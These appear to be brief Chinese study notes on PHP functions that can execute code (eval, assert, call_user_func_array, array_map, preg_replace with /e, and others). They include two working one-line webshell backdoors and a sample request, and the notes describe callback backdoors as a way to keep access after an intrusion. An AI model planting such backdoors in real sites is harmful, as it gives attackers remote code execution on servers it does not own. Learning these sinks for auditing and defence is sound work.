哪些是可以執行代碼執行：php代碼。

eval

如：eval:<?php eval($_post['key']);

eval：php中不被叫做函數叫動態執行命令

assert：執行函數

?call_user_func_array

<?php call_user_func_array('assert',array($_REQUEST['shu']));

傳入xxs-labs/test.php?shu=phpinfo();

?

回調回門（用于留后門的，方便下次滲透）：

回調后門的閉住：call_user_func()

call_user_func_array()

?call_user_func

?array_filter

??arrya_map

?uasort、uksort、array_walk、array_walk_recursive

preg_replace

當匹配的格式有|e的時候匹配到的字符會投到eval里面執行

哪些是可以執行命令：服務器的命令。